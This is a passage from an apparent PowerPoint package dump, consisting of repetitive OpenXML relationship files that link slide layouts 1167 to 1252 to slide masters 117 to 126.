<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1167.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1168.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1169.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.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170.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1171.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1172.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1173.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1174.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1175.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1176.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1177.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1178.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1179.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.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180.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster118.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1181.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1182.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1183.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1184.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1185.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1186.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1187.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1188.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1189.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.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190.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster119.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1192.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1193.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1194.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1195.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1196.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1197.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1198.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1199.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.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00.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster120.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1201.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1202.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1203.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1204.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1205.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1206.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1207.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1208.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1209.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.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210.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster121.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1211.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1212.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1213.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1214.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1215.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1216.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1217.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1218.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1219.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xm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220.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster122.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1221.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1222.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1223.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1224.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1225.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1226.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1227.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1228.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1229.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.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230.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster123.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1231.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1232.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1233.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1234.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1235.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1236.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1237.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1238.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1239.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.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240.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster124.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1241.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1242.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1243.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1244.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1245.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1246.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1247.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1248.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1249.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.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250.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster125.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1251.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster126.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster126.xml"/></Relationships>
</file>

